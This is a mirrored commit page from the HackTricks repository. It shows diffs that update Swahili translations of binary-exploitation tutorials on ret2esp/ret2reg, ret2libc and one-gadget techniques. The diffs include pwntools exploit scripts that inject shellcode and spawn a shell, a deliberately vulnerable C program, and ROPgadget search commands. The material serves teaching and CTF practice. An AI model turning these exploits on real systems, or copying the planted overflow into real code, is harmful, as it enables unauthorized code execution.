Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/rop-return-oriented-programing/ret2esp-

Browse source
This commit is contained in:
Translator 2024-04-12 00:06:25 +00:00
parent 4683bc6e29
commit a07adf3004
17 changed files with 380 additions and 46 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
.gitbook/assets/image (1212).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 188 KiB

BIN
.gitbook/assets/image (1213).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 36 KiB

BIN
.gitbook/assets/image (1214).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 213 KiB

BIN
.gitbook/assets/image (1215).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 244 KiB

BIN
.gitbook/assets/image (1216).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 209 KiB

BIN
.gitbook/assets/image (1217).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 562 KiB

BIN
.gitbook/assets/image (1218).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 297 KiB

BIN
.gitbook/assets/image (1219).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 230 KiB

BIN
.gitbook/assets/image (1220).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 45 KiB

BIN
.gitbook/assets/image (1221).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 247 KiB

BIN
.gitbook/assets/image (1222).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 394 KiB

BIN
.gitbook/assets/image (1223).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 258 KiB

1
SUMMARY.md
View file

@ -705,6 +705,7 @@
* [Leaking libc address with ROP](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md)
* [Leaking libc - template](binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [One Gadget](binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md)
* [Ret2lib + Printf leak - arm64](binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md)
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv.md)
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)

116
binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
View file

@ -2,23 +2,23 @@
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## **Ret2esp**
**Kwa sababu ESP (Stack Pointer) daima inaelekeza juu ya steki**, mbinu hii inahusisha kubadilisha EIP (Instruction Pointer) na anwani ya maagizo ya **`jmp esp`** au **`call esp`**. Kwa kufanya hivi, shellcode inawekwa moja kwa moja baada ya EIP iliyobadilishwa. Wakati maagizo ya `ret` yanatekelezwa, ESP inaelekeza kwenye anwani inayofuata, mahali ambapo shellcode imewekwa.
**Kwa sababu ESP (Stack Pointer) daima inaelekeza juu ya steki**, mbinu hii inahusisha kubadilisha EIP (Instruction Pointer) na anwani ya maagizo ya **`jmp esp`** au **`call esp`**. Kwa kufanya hivi, shellcode inawekwa moja kwa moja baada ya EIP iliyobadilishwa. Wakati maagizo ya `ret` yanapotekelezwa, ESP inaelekeza kwenye anwani inayofuata, mahali ambapo shellcode imewekwa.
Ikiwa **Address Space Layout Randomization (ASLR)** haijaanzishwa kwenye Windows au Linux, inawezekana kutumia maagizo ya `jmp esp` au `call esp` yaliyopatikana kwenye maktaba za pamoja. Walakini, na [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ikiwa imewezeshwa, inaweza kuhitajika kutafuta maagizo haya ndani ya programu yenye kasoro yenyewe (na unaweza kuhitaji kushinda [**PIE**](../common-binary-protections-and-bypasses/pie/)).
Ikiwa **Address Space Layout Randomization (ASLR)** haijashughulikiwa kwenye Windows au Linux, inawezekana kutumia maagizo ya `jmp esp` au `call esp` yaliyopatikana kwenye maktaba za pamoja. Walakini, na [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ikiwa haijashughulikiwa, inaweza kuhitajika kutazama ndani ya programu yenye kasoro yenyewe kwa maagizo haya (na unaweza kuhitaji kushinda [**PIE**](../common-binary-protections-and-bypasses/pie/)).
Zaidi ya hayo, kuweza kuweka shellcode **baada ya uharibifu wa EIP**, badala ya katikati ya steki, kuhakikisha kuwa maagizo ya `push` au `pop` yanayotekelezwa wakati wa operesheni ya kazi hayavurugi shellcode. Kuvuruga huku kunaweza kutokea ikiwa shellcode ingewekwa katikati ya steki ya kazi.
@ -53,7 +53,7 @@ pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
```
Unaweza kuona mfano mwingine wa mbinu hii katika [https://guyinatuxedo.github.io/17-stack\_pivot/xctf16\_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/xctf16\_b0verflow/index.html). Kuna kipeperushi cha kujaza bila NX kuwezeshwa, hutumiwa kifaa cha kupunguza anwani ya `$esp` na kisha `jmp esp;` ili kuruka kwenye shellcode:
Unaweza kuona mfano mwingine wa mbinu hii katika [https://guyinatuxedo.github.io/17-stack\_pivot/xctf16\_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/xctf16\_b0verflow/index.html). Kuna kipeperushi cha kujaza bila NX kuwezeshwa, hutumiwa kifaa cha k**upunguza anwani ya `$esp`** na kisha `jmp esp;` ili kuruka kwenye shellcode:
```python
# From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html
from pwn import *
@ -87,11 +87,10 @@ target.sendline(payload)
# Drop to an interactive shell
target.interactive()
```
## Ret2reg
Vivyo hivyo, ikiwa tunajua kazi inarudisha anwani ambapo shellcode imewekwa, tunaweza kutumia maagizo ya **`call eax`** au **`jmp eax`** (inayojulikana kama mbinu ya **ret2eax**), kutoa njia nyingine ya kutekeleza shellcode yetu. Kama eax, **daftari lingine lolote** lenye anwani ya kuvutia linaweza kutumika (**ret2reg**).
Vivyo hivyo, ikiwa tunajua kwamba kazi inarudisha anwani ambapo shellcode imewekwa, tunaweza kutumia maagizo ya **`call eax`** au **`jmp eax`** (inayojulikana kama mbinu ya **ret2eax**), kutoa njia nyingine ya kutekeleza shellcode yetu. Kama eax, **daftari lingine lolote** linaloendelea anwani ya kuvutia linaweza kutumika (**ret2reg**).
### Mfano
@ -99,14 +98,107 @@ Unaweza kupata mifano hapa:&#x20;
* [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg)
* [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c)
* **`strcpy`** itahifadhi katika **`eax`** anwani ya buffer ambapo shellcode ilihifadhiwa na **`eax`** haibadilishwi, hivyo inawezekana kutumia `ret2eax`.
* **`strcpy`** itahifadhi katika **`eax`** anwani ya buffer ambapo shellcode ilihifadhiwa na **`eax`** haibadilishwi, hivyo niwezekanavyo kutumia `ret2eax`.
## ARM64
### Ret2sp
Katika ARM64 hakuna maagizo yanayoruhusu **kuruka kwenye daftari la SP**. Inaweza kuwa inawezekana kupata kifaa kinachohamisha sp kwa daftari kisha kuruka kwenye daftari hilo, lakini katika libc ya kali yangu sikuweza kupata kifaa kama hicho:
```bash
for i in `seq 1 30`; do
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
done
```
{% endcode %}
Niligundua kuwa wale pekee wangebadilisha thamani ya usajili ambapo sp ilikopiwa kabla ya kuruka kwenda kwake (kwa hivyo itakuwa haifai):
<figure><img src="../../.gitbook/assets/image (1221).png" alt=""><figcaption></figcaption></figure>
### Ret2reg
Ikiwa usajili una anwani ya kuvutia ni sawa kuruka kwenda kwake kwa kupata maagizo sahihi. Unaweza kutumia kitu kama:
```bash
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";
```
{% endcode %}
Katika ARM64, ni **`x0`** ambaye huchukua thamani ya kurudiwa ya kazi, hivyo inaweza kuwa kwamba x0 inahifadhi anwani ya buffer inayodhibitiwa na mtumiaji na shellcode ya kutekelezwa.
Mfano wa nambari:
```c
// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack
#include <stdio.h>
#include <string.h>
void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("br x0");
return;
}
char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}
int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2)
return 0;
}
```
Kwa kuchunguza disassembly ya kazi, ni wazi kuona kwamba **anwani ya buffer** (inayoweza kudhuriwa na **kudhibitiwa na mtumiaji**) imehifadhiwa katika `x0` kabla ya kurudi kutoka kwa buffer overflow:
<figure><img src="../../.gitbook/assets/image (1222).png" alt="" width="563"><figcaption></figcaption></figure>
Pia ni rahisi kupata kifaa cha **`br x0`** katika kazi ya **`do_stuff`**:
<figure><img src="../../.gitbook/assets/image (1223).png" alt="" width="563"><figcaption></figcaption></figure>
Tutatumia kifaa hicho kuruka kwenda kwake kwa sababu binary imekompiliwa **BILA PIE.** Kwa kutumia mfano, ni wazi kuona kwamba **kielelezo cha buffer overflow ni 80**, hivyo shambulio litakuwa:
```python
from pwn import *
p = process('./ret2x0')
elf = context.binary = ELF('./ret2x0')
stack_offset = 72
shellcode = asm(shellcraft.sh())
br_x0 = p64(0x4006a0) # Addr of: br x0;
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0
p.sendline(payload)
p.interactive()
```
{% hint style="warning" %}
Ikiwa badala ya `fgets` ingetumika kitu kama **`read`**, ingewezekana kukiuka PIE pia kwa **kuweka tu byte za mwisho 2 za anwani ya kurudi** kurudi kwenye maagizo ya `br x0;` bila haja ya kujua anwani kamili.\
Na `fgets` haitafanyi kazi kwa sababu **inaweka null (0x00) byte mwishoni**.
{% endhint %}
## Kinga
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): Ikiwa steki haiwezi kutekelezwa hii haitasaidia kwani tunahitaji kuweka shellcode kwenye steki na kuruka kuitekeleza.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Vitu hivyo vinaweza kufanya iwe ngumu kupata maagizo ya kuruka kwa esp au daftari lingine lolote.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Hizi zinaweza kufanya iwe ngumu kupata maagizo ya kuruka kwa esp au usajili mwingine wowote.
## Marejeo
* [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode)
* [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

62
binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
View file

@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
@ -16,16 +16,16 @@ Njia nyingine za kusaidia HackTricks:
## **Maelezo Msingi**
Esensi ya **Ret2Libc** ni kurekebisha mtiririko wa utekelezaji wa programu yenye kasoro kwa kazi ndani ya maktaba iliyoshirikiwa (k.m., **system**, **execve**, **strcpy**) badala ya kutekeleza shellcode iliyotolewa na mkalimani kwenye steki. Mshambuliaji hupanga mzigo wa data ambao unabadilisha anwani ya kurudi kwenye steki ili ielekeze kwenye kazi ya maktaba inayotakiwa, huku pia akifanya mipango kwa ajili ya hoja zozote muhimu kuwekwa sawa kulingana na mkataba wa wito.
Kiini cha **Ret2Libc** ni kurekebisha mtiririko wa utekelezaji wa programu yenye kasoro kwa kazi ndani ya maktaba iliyoshirikiwa (k.m., **system**, **execve**, **strcpy**) badala ya kutekeleza shellcode iliyotolewa na mkaidi kwenye rundo. Mkaidi hupanga mzigo wa data ambao hubadilisha anwani ya kurudi kwenye rundo ili ielekeze kwenye kazi ya maktaba inayotakiwa, huku pia akifanya mipango kwa ajili ya hoja zozote muhimu kuwekwa sawa kulingana na mkataba wa wito.
### **Hatua za Mfano (zilizorahisishwa)**
* Pata anwani ya kazi ya kuita (k.m. system) na amri ya kuita (k.m. /bin/sh)
* Unda mnyororo wa ROP ili kupitisha hoja ya kwanza ikielekeza kwenye herufi ya amri na mtiririko wa utekelezaji kwa kazi
* Pata anwani ya kazi ya kuita (k.m., system) na amri ya kuita (k.m., /bin/sh)
* Unda mnyororo wa ROP ili kupitisha hoja ya kwanza ikielekeza kwenye mfuatano wa amri na mtiririko wa utekelezaji kwa kazi
## Kupata anwani
## Kutafuta anwani
* Kudhani kwamba `libc` inayotumiwa ni ile kutoka kwenye mashine ya sasa unaweza kupata itakapopakiwa kumbukani na:
* Kudhani kwamba `libc` inayotumiwa ni ile kutoka kwenye mashine ya sasa unaweza kupata mahali itakapoloadiwa kumbukani na:
{% code overflow="wrap" %}
```bash
@ -33,21 +33,21 @@ ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change eve
```
{% endcode %}
Ikiwa unataka kujua ikiwa ASLR inabadilisha anwani ya libc unaweza kufanya hivi:
Ikiwa unataka kujua ikiwa ASLR inabadilisha anwani ya libc unaweza kufanya:
```bash
for i in `seq 0 20`; do ldd ./<bin> | grep libc; done
```
* Kwa kujua libc iliyotumiwa pia inawezekana kupata kisawe cha kazi ya `system` kwa:
* Kwa kujua libc iliyotumiwa pia ni rahisi kupata kisawe cha kazi ya `system` kwa:
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
* Kujua libc iliyotumiwa pia inawezekana kupata mbali hadi kwa kazi ya string `/bin/sh` na:
* Kujua libc iliyotumiwa pia ni rahisi kupata kisawe cha kazi ya string `/bin/sh` na:
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
### Kutumia gdb-peda / GEF
Kwa kujua libc iliyotumiwa, Pia ni rahisi kutumia Peda au GEF kupata anwani ya kazi ya **system**, ya kazi ya **exit** na ya string **`/bin/sh`**:
Kwa kujua libc iliyotumika, Pia ni rahisi kutumia Peda au GEF kupata anwani ya kazi ya **system**, ya kazi ya **exit** na ya string **`/bin/sh`** :
```bash
p system
p exit
@ -65,7 +65,7 @@ Katika kesi hii imepakia katika **0xb75dc000** (Hii itakuwa anwani ya msingi ya
## Libc isiyojulikana
Inaweza kuwa inawezekana kwamba **hujui libc ambayo binary inapakia** (kwa sababu inaweza kuwa katika seva ambapo huna ufikiaji wowote). Katika kesi hiyo unaweza kutumia udhaifu wa **kuvuja anwani na kupata libc** ambayo maktaba inatumika:
Inaweza kuwa inawezekana kwamba **hujui libc ambayo binary inapakia** (kwa sababu inaweza kuwa mahali ambapo huna ufikiaji wowote). Katika kesi hiyo unaweza kutumia udhaifu wa **kuvuja anwani na kupata ni libc** ipi inayotumiwa:
{% content-ref url="rop-leaking-libc-address/" %}
[rop-leaking-libc-address](rop-leaking-libc-address/)
@ -79,17 +79,17 @@ Na unaweza kupata templeti ya pwntools kwa hili katika:
### Jua libc na 2 offsets
Angalia ukurasa [https://libc.blukat.me/](https://libc.blukat.me/) na tumia **anwani kadhaa** za kazi ndani ya libc kugundua **toleo lililotumiwa**.
Angalia ukurasa [https://libc.blukat.me/](https://libc.blukat.me/) na tumia **anwani kadhaa** za kazi ndani ya libc ili kugundua **toleo lililotumiwa**.
## Kupitisha ASLR katika biti 32
Mashambulizi haya ya kufanya nguvu ni **yenye manufaa kwa mifumo ya biti 32 tu**.
Mashambulizi haya ya kufanya nguvu ni **yenye manufaa kwa mifumo ya biti 32** tu.
* Ikiwa shambulio ni la ndani, unaweza kujaribu kufanya nguvu ya msingi ya libc (yenye manufaa kwa mifumo ya biti 32):
* Ikiwa shambulio ni la ndani, unaweza kujaribu kufanya nguvu ya anwani ya msingi ya libc (yenye manufaa kwa mifumo ya biti 32):
```python
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
* Kama unashambulia seva ya mbali, unaweza kujaribu **kubaini kwa nguvu anwani ya kazi ya `libc` ya `usleep`**, ukipeleka kama hoja 10 (kwa mfano). Ikiwa kwa wakati fulani **seva inachukua sekunde 10 zaidi kujibu**, umepata anwani ya kazi hii.
* Kama unashambulia seva ya mbali, unaweza kujaribu **kubaini kwa nguvu anwani ya kazi ya `libc` `usleep`**, ukipeleka kama hoja 10 (kwa mfano). Ikiwa kwa wakati fulani **seva inachukua sekunde 10 zaidi kujibu**, umepata anwani ya kazi hii.
## Gadget Moja
@ -101,7 +101,7 @@ Tekeleza kabati kwa kuruka kwa **anwani** moja maalum **tu** katika libc:
## Mfano wa Msimbo wa x86 Ret2lib
Katika mfano huu, kubaini kwa nguvu kwa ASLR imejumuishwa katika msimbo na faili ya binary inayoweza kudhurika iko kwenye seva ya mbali:
Katika mfano huu, kubaini kwa nguvu ASLR imejumuishwa katika msimbo na faili ya binari yenye kasoro iko kwenye seva ya mbali:
```python
from pwn import *
@ -125,29 +125,41 @@ Angalia mfano kutoka:
[..](../)
{% endcontent-ref %}
## Mfano wa ARM64 Ret2lib
Katika kesi ya ARM64, maagizo ya `ret` yanaruka mahali ambapo usajili wa x30 unalinganisha na sio mahali ambapo usajili wa stack unalinganisha. Kwa hivyo ni ngumu kidogo.
Pia katika ARM64 maagizo hufanya kile ambacho maagizo yanafanya (siyo rahisi kuruka katikati ya maagizo na kuyageuza kuwa mengine mapya).
Angalia mfano kutoka:
{% content-ref url="ret2lib-+-printf-leak-arm64.md" %}
[ret2lib-+-printf-leak-arm64.md](ret2lib-+-printf-leak-arm64.md)
{% endcontent-ref %}
## Ret-into-printf (au puts)
Hii inaruhusu **kuvuja kwa habari kutoka kwa mchakato** kwa kuita `printf`/`puts` na data fulani maalum iliyowekwa kama hoja.
Hii inaruhusu **kuvuja kwa habari kutoka kwa mchakato** kwa kuita `printf`/`puts` na data fulani maalum iliyowekwa kama hoja. Kwa mfano kuweka anwani ya `puts` katika GOT katika utekelezaji wa `puts` kutavuja anwani ya `puts` kwenye kumbukumbu.
## Ret2printf
Hii kimsingi inamaanisha kutumia **Ret2lib kubadilisha kuwa udhaifu wa aina ya `printf` format strings** kwa kutumia `ret2lib` kuita printf na thamani za kutumia (inaonekana haina maana lakini inawezekana):
Hii kimsingi inamaanisha kutumia **Ret2lib kugeuza kuwa hitilafu za aina ya `printf`** kwa kutumia `ret2lib` kuita printf na thamani za kutumia (inaonekana haina maana lakini inawezekana):
{% content-ref url="../../format-strings/" %}
[format-strings](../../format-strings/)
{% endcontent-ref %}
## Mifano Mingine & marejeo
## Mifano Mingine & Marejeo
* [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
* Ret2lib, ikitoa kuvuja kwa anwani ya kazi katika libc, kutumia kifaa cha kipekee
* Ret2lib, ikitoa uvujaji wa anwani ya kazi katika libc, ikichukua kifaa kimoja
* [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
* Biti 64, ASLR imewezeshwa lakini hakuna PIE, hatua ya kwanza ni kujaza kuzidi hadi baiti 0x00 ya canary kisha kuita puts na kuvuja. Pamoja na canary, kifaa cha ROP kinajengwa kuita puts kuvuja anwani ya puts kutoka kwa GOT na kifaa cha ROP kuita `system('/bin/sh')`
* Biti 64, ASLR imewezeshwa lakini hakuna PIE, hatua ya kwanza ni kujaza kuzidi hadi baiti 0x00 ya canary kisha kuita puts na kuvuja. Kwa canary, ROP gadget inaundwa kuita puts kuvuja anwani ya puts kutoka GOT na kisha ROP gadget kuita `system('/bin/sh')`
* [https://guyinatuxedo.github.io/08-bof\_dynamic/fb19\_overfloat/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/fb19\_overfloat/index.html)
* Biti 64, ASLR imewezeshwa, hakuna canary, kuzidi kwa stakini kwenye main kutoka kwa kazi ya mtoto. Kifaa cha ROP kuita puts kuvuja anwani ya puts kutoka kwa GOT na kisha kuita kifaa cha kipekee.
* Biti 64, ASLR imewezeshwa, hakuna canary, kuzidi kwa stack katika main kutoka kwa kazi ya mtoto. ROP gadget kuita puts kuvuja anwani ya puts kutoka GOT na kisha kuita kifaa kimoja.
* [https://guyinatuxedo.github.io/08-bof\_dynamic/hs19\_storytime/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/hs19\_storytime/index.html)
* Biti 64, hakuna pie, hakuna canary, hakuna relro, nx. Inatumia kazi ya kuandika kuvuja anwani ya kuandika (libc) na kuita kifaa cha kipekee.
* Biti 64, hakuna PIE, hakuna canary, hakuna relro, nx. Inatumia kazi ya kuandika kuvuja anwani ya kuandika (libc) na kuita kifaa kimoja.
* [https://guyinatuxedo.github.io/14-ret\_2\_system/asis17\_marymorton/index.html](https://guyinatuxedo.github.io/14-ret\_2\_system/asis17\_marymorton/index.html)
* Inatumia stringi ya muundo kuvuja kwa canary kutoka kwa stakini na kuzidi kwa kizio kuita mfumo (ipo kwenye GOT) na anwani ya `/bin/sh`.
* Inatumia kifaa cha muundo wa kuvuja canary kutoka kwa stack na kuzidi kwa buffer kuita mfumo (iko kwenye GOT) na anwani ya `/bin/sh`.
* [https://guyinatuxedo.github.io/14-ret\_2\_system/tu\_guestbook/index.html](https://guyinatuxedo.github.io/14-ret\_2\_system/tu\_guestbook/index.html)
* Biti 32, hakuna relro, hakuna canary, nx, pie. Kutumia indeksi mbaya kuvuja anwani za libc na heap kutoka kwa stakini. Kutumia kuzidi kwa kizio kuita `system('/bin/sh')` (anwani ya heap inahitajika kuvuka ukaguzi).
* Biti 32, hakuna relro, hakuna canary, nx, pie. Kutumia indexing mbaya kuvuja anwani za libc na heap kutoka kwa stack. Kutumia kuzidi kwa buffer kufanya ret2lib kuita `system('/bin/sh')` (anwani ya heap inahitajika kuvuka ukaguzi).

22
binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
View file

@ -1,8 +1,8 @@
# Gadgeti Moja
# Kifaa cha Moja
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,13 +10,13 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
[**Gadgeti Moja**](https://github.com/david942j/one\_gadget) inaruhusu kupata kifaa badala ya kutumia **system** na **"/bin/sh". Gadgeti Moja** itapata ndani ya maktaba ya libc njia ya kupata kifaa (`execve("/bin/sh")`) kwa kutumia tu **anwani moja**.\
[**Kifaa cha Moja**](https://github.com/david942j/one\_gadget) inaruhusu kupata kabibi badala ya kutumia **system** na **"/bin/sh". Kifaa cha Moja** kitapata ndani ya maktaba ya libc njia ya kupata kabibi (`execve("/bin/sh")`) kwa kutumia tu **anwani moja**.\
Hata hivyo, kawaida kuna vizuizi, vya kawaida na rahisi kuepuka ni kama `[rsp+0x30] == NULL` Unapodhibiti thamani ndani ya **RSP** unachotakiwa kufanya ni kutuma thamani zingine za NULL ili kuepuka kizuizi hicho.
![](<../../../.gitbook/assets/image (751).png>)
@ -24,16 +24,20 @@ Hata hivyo, kawaida kuna vizuizi, vya kawaida na rahisi kuepuka ni kama `[rsp+0x
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
